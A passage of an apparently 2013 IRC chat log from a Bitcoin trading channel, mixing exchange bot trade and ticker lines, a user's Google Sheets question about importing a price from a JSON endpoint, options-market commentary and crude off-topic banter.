13 22:33:52 google it Feb 13 22:40:20 ah ok Feb 13 22:40:21 cool Feb 13 22:40:22 thanks Feb 13 22:40:36 yeah, i keep changing the value, but it doesn't rerun the script Feb 13 22:40:44 even though i can rerun it from the script editor Feb 13 22:42:14 also, is there a way to poll mpex for the last price of a given symbol? or bidding price Feb 13 22:42:20 [BTCTC] [RSM] 100 @ 0.0095 = 0.95 BTC [-] Feb 13 22:44:04 you can get either the book or the prices json, its in the faq Feb 13 22:47:17 i know Feb 13 22:47:35 but i just wanted one single price, do i have to find that subobject? or can you query for it directly? Feb 13 22:48:37 no you have to extract it from json Feb 13 22:49:02 mpex is too good to take user input Feb 13 22:49:52 mjr_ i think something like live.coinbr.com/last?mpsic=MPSIC can be added easily Feb 13 22:50:12 lol, i do like it Feb 13 22:50:17 and thanks jurov, that would be awesome Feb 13 22:50:47 It would be nice to have an autoupdating spreadsheet that lists total positions and relative gain Feb 13 22:54:55 also, on an interesting note, depending on how i value my options, i am either -$0.17 or +$3.16 Feb 13 22:55:57 or +$1.44 Feb 13 22:56:50 respectively that is cost of bitcoins at present exchange, cost of bitcoins at my conversion cost, or cost of bitcoins at time of option purchase Feb 13 22:57:30 so as you can see, it is not trivial which number i use, and i still cannot figure out which is the correct one to use. I think at the end of the day it is really just my choice, but I am curious how ForEx guys do it Feb 13 22:58:58 [MPEX] [S.MPOE] 4321 @ 0.00065196 = 2.8171 BTC [+] Feb 13 22:59:00 [MPEX] [S.MPOE] 12989 @ 0.00065223 = 8.4718 BTC [+] Feb 13 22:59:05 odds are there's no "correct" one Feb 13 22:59:12 you have to decide what you are tryng to do Feb 13 23:01:21 show the most impressive results Feb 13 23:01:29 without cheating Feb 13 23:04:01 [HAVELOCK] [SDICE] 10 @ 0.725 = 7.25 BTC [-] Feb 13 23:08:05 [MPEX] [S.MPOE] 5 @ 0.00064718 = 0.0032 BTC [-] Feb 13 23:08:09 mjr_ done: http://live.coinbr.com/last?mpsic=S.MPOE Feb 13 23:08:12 [MPEX] [S.MPOE] 500 @ 0.00064717 = 0.3236 BTC [-] Feb 13 23:08:14 [MPEX] [S.MPOE] 5500 @ 0.00064229 = 3.5326 BTC [-] Feb 13 23:08:17 [MPEX] [S.MPOE] 4321 @ 0.00064228 = 2.7753 BTC [-] Feb 13 23:08:18 [MPEX] [S.MPOE] 12050 @ 0.0006418 = 7.7337 BTC [-] Feb 13 23:08:21 or similar format for others? Feb 13 23:08:23 [MPEX] [S.MPOE] 2324 @ 0.00064111 = 1.4899 BTC [-] Feb 13 23:08:48 what others? just change mpsoc parameter Feb 13 23:08:57 yes, that is what i meant Feb 13 23:09:04 thanks so much that is awesome Feb 13 23:09:49 mircea_popescu: mpex key expire, 1 year from 2011 is mar 2012 or do you mean expire in 2 years to expire next month? Feb 13 23:10:36 1 year from 2012 march 11 is 2013 march 10th Feb 13 23:10:47 he already announced he'll replace it on 10th march Feb 13 23:11:43 your mpex-key page says 1 year from March 2011 Feb 13 23:12:21 which is why I asked Feb 13 23:13:17 hum Feb 13 23:13:19 link me ? Feb 13 23:14:31 http://trilema.com/2013/new-mpex-key/ 2nd sentence in para after 94 print 'gpg' Feb 13 23:17:49 good catch Feb 13 23:18:19 I was wondering if gpg had got some new timewarping functionality... Feb 13 23:19:46 i fucked up the year Feb 13 23:19:49 thanks for that! Feb 13 23:20:23 or MP is secretly operating since 2011 :P Feb 13 23:23:00 [HAVELOCK] [SDICE] 1 @ 0.745 BTC [+] Feb 13 23:23:47 well yes, the old mpoe page was born in like august 2011 Feb 13 23:25:16 ugh having problems with google docs Feb 13 23:25:29 won't just give me the subobject Feb 13 23:30:25 should i not be able to do this? =ImportData("http://live.coinbr.com/last?mpsic=S.DICE")."last"[2] Feb 13 23:31:14 !ticker mpex s.sdice Feb 13 23:31:16 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Feb 13 23:31:18 !ticker mpex s.dice Feb 13 23:31:19 [MPEX:S.DICE] 1D: 0.00599414 / 0.00618588 / 0.0063 (34077 shares, 210.80 BTC), 7D: 0.004321 / 0.00622371 / 0.0065 (2175631 shares, 13,540.51 BTC), 30D: 0.00085848 / 0.0056034 / 0.0075 (8215991 shares, 46,037.55 BTC) Feb 13 23:31:20 stfu assbot Feb 13 23:31:26 lol Feb 13 23:31:27 [MPEX] [S.MPOE] 4321 @ 0.0006518 = 2.8164 BTC [+] Feb 13 23:31:27 [MPEX] [S.MPOE] 2450 @ 0.00065181 = 1.5969 BTC [+] Feb 13 23:34:47 where was the largest SD mention on some bigger gambling related site Feb 13 23:34:50 i cant remember Feb 13 23:35:05 s/largerst/larger Feb 13 23:35:05 some blog yeah Feb 13 23:35:26 lookin for sauce Feb 13 23:35:43 I thought it was 'pokerscout' or something to that effect....looking now. Feb 13 23:35:56 what if instead of spending money on video cards, motherboards, and a crudely built home depot rack, you spent that money on hydroponic equipment and you mined weed, same as bitcoins except you end up with something that has value Feb 13 23:36:00 lol somethingawful delivers Feb 13 23:37:01 ya right Feb 13 23:37:05 [MPEX] [S.MPOE] 4321 @ 0.00065153 = 2.8153 BTC [-] Feb 13 23:37:07 [MPEX] [S.MPOE] 20958 @ 0.00065181 = 13.6606 BTC [+] Feb 13 23:37:40 obama said 'no' -- they'll figure out a way to jack-boot that also. Feb 13 23:37:40 "bitcoin mining seems like a potential first step in a weed grow-op, though. start off with a big bitcoin mining operation, enough to get the cops to search the place looking for weed. then after everyone's had a big laugh over the crazy kid "mining for buttcoins", sell off the computers and immediately start growing weed." Feb 13 23:37:44 [BTCTC] [RSM] 1 @ 0.0095 BTC [-] Feb 13 23:37:52 it's like... 500 ways of stubbornly not eating your spinach Feb 13 23:38:12 they've decided bitcoin is bad, so now are making brocolli statues out of it Feb 13 23:38:36 to me it's like r/atheism ... i want to spend all day talking about something I don't believe in Feb 13 23:38:54 and about how much i don't believe it Feb 13 23:39:08 i think there are some SA ppl that were early bitcoin adopters, so there are also a lot of SA posters that are bitter and jealous about that Feb 13 23:39:13 lol Feb 13 23:39:30 well at least they're preserving some shit the bitcoin forum deleted Feb 13 23:39:41 lol Feb 13 23:39:48 which incidentally... who was the monumental retard who alloewd post deletion on btctalk ? Feb 13 23:39:54 evangelising athiests are the WORST Feb 13 23:40:02 way worse than evangelising religious ppl Feb 13 23:40:38 the difference is religious ppl at least are cool with the idea that maybe there is more than one possible viewpoint Feb 13 23:40:50 kakobrekla: http://www.pokerscout.com/news/weekly-traffic-update.aspx?year=2013&week=7 Feb 13 23:41:03 hm Feb 13 23:41:07 i just found Feb 13 23:41:07 http://calvinayre.com/2013/02/01/business/why-bitcoin-can-no-longer-be-ignored/ Feb 13 23:41:10 so what is this about gambling being possibly legalised in new jersey? apparently there were some subtantial rises in betting shares in the lst week Feb 13 23:41:12 athiests are just 100% certain they are right all the time Feb 13 23:41:27 yeah, agnostic is the only rational thing really Feb 13 23:42:19 Heh, evoorhees wrote that article Feb 13 23:43:20 ya it was the calvinaire thing Feb 13 23:43:22 absence of evidence is NOT evidence of absence Feb 13 23:44:02 so yeah, agnostics rule, they just chill and have fun, and don't worship richard dawkins all day, while talking about things they don't believe in Feb 13 23:44:29 omg, am i talking about atheism that I don't believe in?? what a vicious cycle... Feb 13 23:44:38 hhahaha, how meta can we get Feb 13 23:45:10 anyway, anyone know how to pull a value from a json object in google docs? Feb 13 23:45:23 i did it a week ago, but for some reason, i can't do it again Feb 13 23:45:38 i'm using =importData() Feb 13 23:46:03 and yes, i like discussions too Feb 13 23:46:15 as long as they are not dogmatic...i mean what's the point then right? Feb 13 23:46:25 let's just both believe what we choose to believe since we aren't going to listen Feb 13 23:46:54 mjr_: Im seriously considering starting the church of satoshi Feb 13 23:47:00 NICE Feb 13 23:47:07 yeah true Feb 13 23:47:18 mjr_: I already named myself the pope of it as a joke quite a few years ago Feb 13 23:47:39 i picture a cloud atlas future where people worship satoshi and live life according to his precepts while trying to avoid being cannibalized Feb 13 23:48:06 lol, not really Feb 13 23:48:17 they jump around a lot Feb 13 23:48:35 and i think it was common knowledge (in the trailer) that they show the future Feb 13 23:48:56 i do recommend it though, it is not the best, but it is pretty great Feb 13 23:49:06 http://i.imgur.com/eKgAP6O.jpg Feb 13 23:50:37 da fuck ? Feb 13 23:50:45 is this a line for dogs ? Feb 13 23:51:27 dogs? Feb 13 23:51:57 recognise person by scent Feb 13 23:54:12 i don't think anything is a spoiler for cloud atlas Feb 13 23:55:07 it's like a 3 hour movie, and after i watched it and the credits started to roll, i felt like i had just watched a 3 hour trailer for a movie called "cloud atlas", which seems really cool and all.. but that i still haven't seen yet Feb 13 23:57:01 yeah, it is not executed perfectly, but i think its themes are powerful Feb 13 23:57:26 to be honest, i think some of it even relates to bitcoins...in some ways Feb 13 23:57:37 also, i sort of feel like that movie was like.. part of loni warchowski's transformation into a woman Feb 13 23:57:39 though i think i can see parallels to bitcoins in almost anything Feb 13 23:57:47 like with all of the gender bending of roles and stuff Feb 13 23:57:50 yeah, i could see that Feb 13 23:57:52 very true Feb 13 23:57:58 dressing hugo weaving up like a lady Feb 13 23:59:59 Circumcised males are against the will of God. Feb 14 00:00:02 clearly he is wrong Feb 14 00:00:05 importData(http://live.coinbr.com/last?mpsic=S.MPOE)["last"][3] Feb 14 00:00:18 that should work i think, but it doesn't Feb 14 00:01:24 i keep getting parse error Feb 14 00:02:19 [BTCTC] [GSDPT] 10 @ 0.006 = 0.06 BTC [-] Feb 14 00:04:52 hi truffles Feb 14 00:09:19 [BTCTC] [S.MPOE-PT] 10 @ 0.00067 = 0.0067 BTC [-] Feb 14 00:09:32 "I already get enough shit because the general public think the legal adult industry and the illegal adult industry are all the same. I'm not asking for a second helping." Feb 14 00:09:34 wait, what ?! Feb 14 00:10:01 [HAVELOCK] [HIM] 1 @ 14.1 BTC [+] Feb 14 00:11:01 [HAVELOCK] [SDICE] 7 @ 0.7499998 = 5.25 BTC [+] Feb 14 00:14:55 evening gentlemen Feb 14 00:15:18 there's another joke like that w/ a punchline of the wallet turning into a suitcase if you rubbed it a little Feb 14 00:16:09 like the dude saved foreskins and made leather goods out of them Feb 14 00:18:10 "If MP has any dirty laundry such as child sex charges or other things it will be found by SA. Then MP can be right up there with such luminaries as Bruce Wagner." Feb 14 00:18:21 srsly, the forum :D Feb 14 00:26:01 [HAVELOCK] [SDICE] 4 @ 0.7499998 = 3 BTC [+] Feb 14 00:26:57 [MPEX] [S.DICE] 1000 @ 0.00598093 = 5.9809 BTC [-] Feb 14 00:26:59 [MPEX] [S.DICE] 50 @ 0.00598092 = 0.299 BTC [-] Feb 14 00:28:20 I was rubbing my wallet.dat a little and it didn't change to any suitcase. Feb 14 00:34:54 [MPEX] [S.MPOE] 2600 @ 0.0006442 = 1.6749 BTC [-] Feb 14 00:34:56 [MPEX] [S.MPOE] 4321 @ 0.00064135 = 2.7713 BTC [-] Feb 14 00:35:04 [MPEX] [S.MPOE] 4321 @ 0.00064126 = 2.7709 BTC [-] Feb 14 00:35:06 [MPEX] [S.MPOE] 7808 @ 0.00064111 = 5.0058 BTC [-] Feb 14 00:48:04 http://mpex.co/ Feb 14 00:48:07 new header :D Feb 14 00:55:28 [MPEX] [S.MPOE] 3445 @ 0.00064111 = 2.2086 BTC [-] Feb 14 00:55:30 [MPEX] [S.MPOE] 4321 @ 0.00063943 = 2.763 BTC [-] Feb 14 00:55:32 [MPEX] [S.MPOE] 3084 @ 0.00063942 = 1.972 BTC [-] Feb 14 00:55:33 [MPEX] [S.MPOE] 3084 @ 0.00063942 = 1.972 BTC [-] Feb 14 00:59:02 3 hours of waiting in the Burning Man ticket queue. Feb 14 00:59:03 sux Feb 14 00:59:51 lal Feb 14 01:02:12 i've never waited in a queue. Feb 14 01:02:15 [MPEX] [S.DICE] 5 @ 0.00609587 = 0.0305 BTC [+] Feb 14 01:02:17 why the fuck would you ?! Feb 14 01:02:19 hm, looking to the site, do you ask "I understand that I will be required to pay 30 BTC" to be written in chinese/farsi FAQ, too? Feb 14 01:02:23 > The only Bitcoin service that has never been hacked. Feb 14 01:02:24 lies. Feb 14 01:02:27 ;;google youtube les claypool burning man Feb 14 01:02:27 Hey Are Ya Goin to Burning Man - Claypool / Electric ... - YouTube: ; Electric Apricot - Burning Man - YouTube: ; Hey are you going to Burning Man - Live at Festeroo - YouTube: Feb 14 01:02:31 online queue Feb 14 01:02:38 jurov no, foreigners get off easy Feb 14 01:02:52 Bugpowder o thought you were checking on mobile Feb 14 01:02:55 foursquare style Feb 14 01:03:03 [MPEX] [S.DICE] 45 @ 0.00609587 = 0.2743 BTC [+] Feb 14 01:03:15 nope Feb 14 01:03:18 kakobrekla ya well! lies & drama back bitcoin Feb 14 01:03:33 I refreshed the initial page to slow and got in line 1 minute after it opened Feb 14 01:03:42 lol Feb 14 01:03:43 now a 3 hour wait Feb 14 01:03:51 my friend got his in 10 minutes. Feb 14 01:03:53 fuc Feb 14 01:03:54 lol it's like... in motorests in austria, there are slovak warnings "to use toilet you have to pay". slovak only. Feb 14 01:04:03 hahaha Feb 14 01:04:12 slovakistan!!! Feb 14 01:05:10 jurov but honestly : it is in the farsi faq Feb 14 01:05:21 and the chinese one has a guy doing it anyway Feb 14 01:05:44 also http://www.stripperweb.com/forum/showthread.php?173251-Have-you-heard-of-this-new-currency-and-way-of-getting-paid-called-Bitcoins this is kinda funny. Feb 14 01:06:37 Banned Feb 14 01:07:30 what ?! Feb 14 01:07:52 the author was banned Feb 14 01:07:54 from the forums Feb 14 01:08:52 o yeah Feb 14 01:09:02 some bitcoin tard "educating" a buncha strippers about bitcoin Feb 14 01:09:24 it ended up something like, random bitcointalk dood walks into a forum populated by 5000 mpoeprs Feb 14 01:09:55 5000 mpoeprs *wipes monitor* Feb 14 01:10:09 damn straight Feb 14 01:10:56 but seriously now : somebody should make a bitcoin based webcam programme. Feb 14 01:11:11 that industry is currently fucked in the ass by HIRE Feb 14 01:11:16 on top of all the other nonsense. Feb 14 01:14:07 HIRE? Feb 14 01:14:28 yes. Feb 14 01:14:34 whats that Feb 14 01:14:56 the mericans came up with this really retarded idea whereby anyone sending money into the us has to also apply the us laws to their customers Feb 14 01:15:18 which is why most non-us banks aren't actually dealing with transfers towards the us anymore Feb 14 01:15:35 and to top it all off next year ALL transfers will have to be charged 30% tax Feb 14 01:15:40 regardless if they're taxable or not. Feb 14 01:16:15 wat? Feb 14 01:16:20 30% wat? Feb 14 01:16:27 30% fuck you fee. Feb 14 01:16:33 link? Feb 14 01:16:38 srsly. if you're an american and have a foreign bank account Feb 14 01:16:48 you will be charged on all transfers. Feb 14 01:16:54 what does this have to to with free trade talkings that i posted about today Feb 14 01:17:04 http://www.bracewellgiuliani.com/news-publications/updates/hire-act-2010-increases-need-international-tax-compliance Feb 14 01:17:07 this is pretty old shit ? Feb 14 01:17:46 many countries and banks don't allow american customers Feb 14 01:18:16 13 February 2013: EU and US free-trade talks launched Feb 14 01:18:21 this is only if they don't report who the account owner is Feb 14 01:18:24 any realation to that' Feb 14 01:18:37 there is no withholding if they do report it seems Feb 14 01:18:40 kakobrekla not much really. Feb 14 01:18:44 Bugpowder guess who is going to report ? Feb 14 01:18:47 just applying pressure to Switz Feb 14 01:18:55 nah, by now the incentives just aren't there. Feb 14 01:18:59 much cheaper to cut the us loose. Feb 14 01:19:17 BITCOIN RALLY ON IRC CHAT DISCUSSION Feb 14 01:19:22 totally. Feb 14 01:19:30 tbh i was pretty certain the cause of the rally is this Feb 14 01:19:36 some provisions start in march Feb 14 01:19:47 people were trying to wait past the halving but not much past march, so... squeeze. Feb 14 01:20:23 if you can afford the fee, they don't charge you Feb 14 01:20:35 seriously Feb 14 01:20:44 heh. Feb 14 01:20:44 Platinum... Feb 14 01:20:52 Admiral shares Feb 14 01:20:57 who the fuck is paying 30% ? Feb 14 01:20:59 Vanguard Flagship account Feb 14 01:21:07 nobody is paying 30% Feb 14 01:21:10 right. Feb 14 01:21:12 thye will report Feb 14 01:21:16 no they won't. Feb 14 01:21:20 they'll jsut shrug and carry on. Feb 14 01:21:26 or people will have money for offshore Feb 14 01:21:30 and money for onshore Feb 14 01:21:35 pretty much Feb 14 01:21:37 and never the twain shall meet Feb 14 01:21:43 except via btc Feb 14 01:21:52 in the unlikely event there's someone wioth any wealth left physically in the us Feb 14 01:21:55 jesus bitcoin is amazing Feb 14 01:21:58 which seems rather improbable atm Feb 14 01:21:58 lol Feb 14 01:22:04 you are so fucking negative Feb 14 01:22:23 nah Feb 14 01:22:29 not as rich Feb 14 01:22:33 but yes Feb 14 01:22:38 other professions with money Feb 14 01:22:52 ;;ticker Feb 14 01:22:52 BTCUSD ticker | Best bid: 25.00000, Best ask: 25.15000, Bid-ask spread: 0.15000, Last trade: 25.00000, 24 hour volume: 82323.14434998, 24 hour low: 24.47998, 24 hour high: 26.30000, 24 hour vwap: 25.57240 Feb 14 01:23:07 This is getting serious Feb 14 01:23:22 anybody want to buy some calls? Feb 14 01:23:24 things are getting serious... Feb 14 01:23:57 http://www.youtube.com/watch?v=1IRGenlpf-E Feb 14 01:24:04 and you haven't stopped talking since Feb 14 01:24:15 that was last week Feb 14 01:25:09 what ?! Feb 14 01:25:30 hm, is my ignore filtering half the chat again ? Feb 14 01:25:43 truffles Feb 14 01:26:03 told ya. Feb 14 01:26:46 it's funny how that works, i add names, the killed lines counter jumps to hundreds a day, then a few weeks later it's back to 0 Feb 14 01:26:49 then... Feb 14 01:27:21 you have a killed lines counter? :D Feb 14 01:27:30 damn. Feb 14 01:27:58 i have ignore stats ! im from like... the future. Feb 14 01:28:32 does it say on the end of report "you are very ignorant" :D Feb 14 01:31:02 once btcusd goes to 133 coinbr acct will cost 12 bucks/month too, then :P Feb 14 01:32:09 I dunno about this dump Feb 14 01:32:11 seems reall Feb 14 01:32:16 feels toppy Feb 14 01:32:40 its persistent Feb 14 01:32:48 lots of overhead resistance Feb 14 01:33:26 http://bitbet.us/bet/221/btc-usd-at-mtgox-will-stay-above-20-24-and/ Feb 14 01:33:30 money for grabs if so Feb 14 01:34:11 fuck bitbet... i made few small bets slightly drunk Feb 14 01:34:16 using coinbr wallet Feb 14 01:34:37 now i realized i have to check every deposit whether it isn't something from bitbet Feb 14 01:34:44 loool Feb 14 01:34:57 just use a different output addy Feb 14 01:35:11 oh yea Feb 14 01:36:08 and add alcohol tester to coinbr admin interface Feb 14 01:36:33 you will trick yourself using different drugs. Feb 14 01:36:37 no good. Feb 14 01:38:00 there we go, dumping. Feb 14 01:38:51 24.6 Feb 14 01:38:56 24.5 Feb 14 01:39:19 24.4 Feb 14 01:39:26 good, I want the price to go down. Need to buy more coings. Feb 14 01:39:27 coins* Feb 14 01:39:59 ;;ticker Feb 14 01:39:59 BTCUSD ticker | Best bid: 24.49753, Best ask: 24.50000, Bid-ask spread: 0.00247, Last trade: 24.50000, 24 hour volume: 86614.45783048, 24 hour low: 24.48752, 24 hour high: 26.30000, 24 hour vwap: 25.53151 Feb 14 01:40:50 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 14 01:45:06 [MPEX] [O.BTCUSD.P230T] 948 @ 0.06641709 = 62.9634 BTC Feb 14 01:45:53 lmao jurov Feb 14 01:46:04 ;;ticker Feb 14 01:46:05 BTCUSD ticker | Best bid: 24.50000, Best ask: 24.63661, Bid-ask spread: 0.13661, Last trade: 24.63661, 24 hour volume: 87831.55624440, 24 hour low: 24.48752, 24 hour high: 26.30000, 24 hour vwap: 25.51202 Feb 14 01:46:09 ;;bc,convert eur Feb 14 01:46:10 1 BTC = 24.63661 U.S. dollars = 18.2859126 Euros Feb 14 01:46:20 well... i sold my 200 at 17 so a way to go. Feb 14 01:46:28 [MPEX] [O.BTCUSD.P230T] 52 @ 0.06641709 = 3.4537 BTC Feb 14 01:46:52 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Feb 14 01:46:57 bitstamp stuck at 25 again Feb 14 01:47:11 that poor guy with the short puts Feb 14 01:47:15 he's getting massacred again Feb 14 01:47:34 What? Feb 14 01:53:06 [MPEX] [O.BTCUSD.C200T] 745 @ 0.21602472 = 160.9384 BTC [-] Feb 14 01:53:19 [MPEX] [O.BTCUSD.C190T] 745 @ 0.25537348 = 190.2532 BTC [+] Feb 14 01:53:36 Namworld bitcoin is dropping Feb 14 01:53:49 [MPEX] [O.BTCUSD.C180T] 744 @ 0.29472225 = 219.2734 BTC [+] Feb 14 01:54:02 [MPEX] [O.BTCUSD.C170T] 735 @ 0.33407101 = 245.5422 BTC [-] Feb 14 01:54:20 [MPEX] [O.BTCUSD.C160T] 4 @ 0.37341978 = 1.4937 BTC [+] Feb 14 01:56:13 Someone is cashing in his calls or something. Feb 14 01:56:34 [MPEX] [O.BTCUSD.P250T] 1000 @ 0.10775591 = 107.7559 BTC Feb 14 01:57:27 It just dropped a bit. Feb 14 01:57:33 a tad. Feb 14 01:57:33 [MPEX] [O.BTCUSD.P240T] 1000 @ 0.08563291 = 85.6329 BTC Feb 14 01:57:46 [MPEX] [O.BTCUSD.P230T] 1000 @ 0.06697417 = 66.9742 BTC [+] Feb 14 01:58:11 ;;ticker Feb 14 01:58:11 BTCUSD ticker | Best bid: 24.29000, Best ask: 24.30000, Bid-ask spread: 0.01000, Last trade: 24.30000, 24 hour volume: 89583.97608075, 24 hour low: 24.23140, 24 hour high: 26.30000, 24 hour vwap: 25.48663 Feb 14 01:58:44 [MPEX] [O.BTCUSD.P260T] 1000 @ 0.13408587 = 134.0859 BTC [-] Feb 14 01:59:09 cashing in on puts? Feb 14 01:59:15 nope Feb 14 01:59:16 buying Feb 14 01:59:42 good luck Feb 14 02:01:51 GOT 2 BURNING MAN TIX Feb 14 02:01:55 [MPEX] [S.MPOE] 4321 @ 0.00063952 = 2.7634 BTC [+] Feb 14 02:01:57 [MPEX] [S.MPOE] 11916 @ 0.00063942 = 7.6193 BTC [-] Feb 14 02:01:58 [MPEX] [S.MPOE] 4366 @ 0.00063878 = 2.7889 BTC [-] Feb 14 02:02:00 [MPEX] [O.BTCUSD.P230T] 100 @ 0.06707301 = 6.7073 BTC [+] Feb 14 02:02:01 [MPEX] [O.BTCUSD.P230T] 900 @ 0.06707301 = 60.3657 BTC [+] Feb 14 02:02:15 [MPEX] [O.BTCUSD.P240T] 1000 @ 0.08576716 = 85.7672 BTC [+] Feb 14 02:02:28 [MPEX] [O.BTCUSD.P250T] 1000 @ 0.10793223 = 107.9322 BTC [+] Feb 14 02:03:24 battle for the puts Feb 14 02:03:24 a dollar difference still stamp vs gox Feb 14 02:03:51 teh whoa Feb 14 02:04:51 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.48629718 = 486.2972 BTC [+] Feb 14 02:04:56 LOL Feb 14 02:04:59 FUCKING LOSER Feb 14 02:05:11 close that short Feb 14 02:05:22 seems you've totally spooked everyone Bugpowder Feb 14 02:05:33 he;'s only down 20% on this round. Feb 14 02:06:02 DIVE DIVE DIVE Feb 14 02:07:43 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 14 02:07:45 is not bad Feb 14 02:08:13 "official" Feb 14 02:08:53 what the hell are you talking about Feb 14 02:09:18 lol s.dice? Feb 14 02:09:41 but yeah market price is the price you can get them at, but no you can't get bitcoins from s.dice except dividend day or winning bets Feb 14 02:10:19 yeah theres an official place that sells 25$ btcs Feb 14 02:10:25 https://en.bitcoin.it/wiki/Buying_bitcoins Feb 14 02:10:49 kakobrekla luke ? Feb 14 02:10:53 aha Feb 14 02:10:54 ;) Feb 14 02:11:27 23.8 btw Feb 14 02:11:36 [MPEX] [O.BTCUSD.P230T] 1000 @ 0.06763205 = 67.6321 BTC [+] Feb 14 02:11:49 [MPEX] [O.BTCUSD.P240T] 1000 @ 0.0864789 = 86.4789 BTC [+] Feb 14 02:11:54 that fucker got the 230s again Feb 14 02:11:58 what the hell are you talking about Feb 14 02:12:01 Ok I have enough puts Feb 14 02:12:09 im guessing this weeked could be a good time to stock up if needed Feb 14 02:12:14 weekend Feb 14 02:12:18 im gonna ignpore ore you too truffles if you dont stat making sense Feb 14 02:12:29 This will either make the ponzi plot truly explode.... or make me cry Feb 14 02:13:01 are you an SEC bitcoin narc? Feb 14 02:13:23 i think he's just a retard Feb 14 02:14:02 Hey, I want some puts too Feb 14 02:14:05 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.48869324 = 488.6932 BTC [+] Feb 14 02:14:10 oh wow Feb 14 02:14:18 well now you have 50 places from that link Feb 14 02:14:21 ;;ticker Feb 14 02:14:22 BTCUSD ticker | Best bid: 23.61000, Best ask: 23.87675, Bid-ask spread: 0.26675, Last trade: 23.61000, 24 hour volume: 94921.36763921, 24 hour low: 23.61000, 24 hour high: 26.30000, 24 hour vwap: 25.39773 Feb 14 02:14:28 [BTCTC] [BASIC-MINING] 5 @ 0.349 = 1.745 BTC [-] Feb 14 02:14:29 aha. teh drop huh. Feb 14 02:14:30 [BTCTC] [BASIC-MINING] 34 @ 0.3499 = 11.8966 BTC [+] Feb 14 02:14:31 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 14 02:14:37 dude that guy got fucked two times Feb 14 02:14:52 He is the top caller Feb 14 02:15:05 lol srsly. Feb 14 02:15:13 it's not going back up for now. Feb 14 02:15:21 Some guy overbought on calls/oversold puts? Feb 14 02:15:54 like last month? Feb 14 02:15:59 some whale shorted like i dunno, 20, 30k worth of deep puts last exercise Feb 14 02:16:02 he bought 30,000 calls at the top last time Feb 14 02:16:04 then covered for like -5k Feb 14 02:16:11 oh Feb 14 02:16:12 then like... yesterday ? sold 5k Feb 14 02:16:12 yeah Feb 14 02:16:15 it was shorting puts Feb 14 02:16:15 and now is covering them Feb 14 02:16:31 Bugpowder someone was buying calls too Feb 14 02:16:34 but i think it was someone else Feb 14 02:17:09 it's ridiculous by now, within 24 hours he's screwed. Feb 14 02:18:24 should be good for S.MPOE Feb 14 02:18:33 meanwhile back at the pussyranch, http://www.stripperweb.com/forum/showthread.php?181800-Bitcoin-Giveaway Feb 14 02:18:59 23.1 Feb 14 02:21:05 [MPEX] [S.MPOE] 12784 @ 0.00063878 = 8.1662 BTC [-] Feb 14 02:21:07 [MPEX] [S.MPOE] 3516 @ 0.00063701 = 2.2397 BTC [-] Feb 14 02:21:12 mircea_popescu: PR should also mention that 1BTC is over $20 USD Feb 14 02:21:26 why ? Feb 14 02:21:55 cuz why would thy bother? they probably don't realize that bit coins are worth anything Feb 14 02:22:01 [MPEX] [O.BTCUSD.P230T] 1000 @ 0.06977665 = 69.7767 BTC [+] Feb 14 02:22:21 ;;ticker Feb 14 02:22:22 BTCUSD ticker | Best bid: 23.06000, Best ask: 23.10500, Bid-ask spread: 0.04500, Last trade: 23.10500, 24 hour volume: 100067.34572136, 24 hour low: 23.06000, 24 hour high: 26.30000, 24 hour vwap: 25.28815 Feb 14 02:22:36 awesome, keep dropping... Feb 14 02:24:01 where is your bid at pizza? :) Feb 14 02:24:16 I have no bid :( ACH is slow... Feb 14 02:24:18 so, another good month for S.MPOE in sight, mircea? Feb 14 02:24:31 with all the calls that were bought =P Feb 14 02:25:19 ;;ticker Feb 14 02:25:20 BTCUSD ticker | Best bid: 23.03655, Best ask: 23.10000, Bid-ask spread: 0.06345, Last trade: 23.03655, 24 hour volume: 100563.10296792, 24 hour low: 23.03655, 24 hour high: 26.30000, 24 hour vwap: 25.27701 Feb 14 02:25:39 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 14 02:25:40 lulz Feb 14 02:25:51 whoa Feb 14 02:25:56 that's a lopsided market Feb 14 02:26:39 this is cool to watch Feb 14 02:27:19 Namworld prolly Feb 14 02:27:24 http://bitcoinity.org/markets Feb 14 02:27:25 course you never know. Feb 14 02:27:31 ;;ticker Feb 14 02:27:32 BTCUSD ticker | Best bid: 23.02002, Best ask: 23.10001, Bid-ask spread: 0.07999, Last trade: 23.02002, 24 hour volume: 101056.49539453, 24 hour low: 23.02002, 24 hour high: 26.30000, 24 hour vwap: 25.26533 Feb 14 02:27:35 yeah, we'll see about it. Feb 14 02:27:53 things can change in half hour. Feb 14 02:28:42 ok for real truffles, start in #bitcoin-otc or smth Feb 14 02:28:57 [MPEX] [S.MPOE] 3900 @ 0.00063701 = 2.4843 BTC [-] Feb 14 02:29:04 start meaning start. Feb 14 02:29:15 Yeah, but the growth was a bit unrealistic. Feb 14 02:29:40 there was no one selling, no ask depth. Price increasing very fast. Feb 14 02:31:26 right, because we're going to put you on ignore Feb 14 02:32:36 ;;ticker Feb 14 02:32:36 BTCUSD ticker | Best bid: 23.04000, Best ask: 23.20000, Bid-ask spread: 0.16000, Last trade: 23.20000, 24 hour volume: 106681.62083572, 24 hour low: 22.02100, 24 hour high: 26.30000, 24 hour vwap: 25.10876 Feb 14 02:32:46 stopped for now huh Feb 14 02:32:53 lunch break. Feb 14 02:34:38 what? Feb 14 02:35:04 No, it's near 22 USD/BTC now Feb 14 02:35:11 MtGox is lagging bad Feb 14 02:35:27 http://www.bitcoincharts.com/markets/mtgoxUSD.html Feb 14 02:35:34 lol, that chart is FUNNY Feb 14 02:35:47 ;;goxlag Feb 14 02:35:47 249.494233 seconds Feb 14 02:39:04 ;;ticker Feb 14 02:39:05 BTCUSD ticker | Best bid: 22.02100, Best ask: 23.05000, Bid-ask spread: 1.02900, Last trade: 23.05000, 24 hour volume: 107968.90102643, 24 hour low: 22.02100, 24 hour high: 26.30000, 24 hour vwap: 25.07438 Feb 14 02:39:13 whoa Feb 14 02:39:13 $1 spread?... Feb 14 02:39:30 :> Feb 14 02:41:51 ;;ticker Feb 14 02:41:52 BTCUSD ticker | Best bid: 22.55933, Best ask: 22.80000, Bid-ask spread: 0.24067, Last trade: 23.05000, 24 hour volume: 109588.67124306, 24 hour 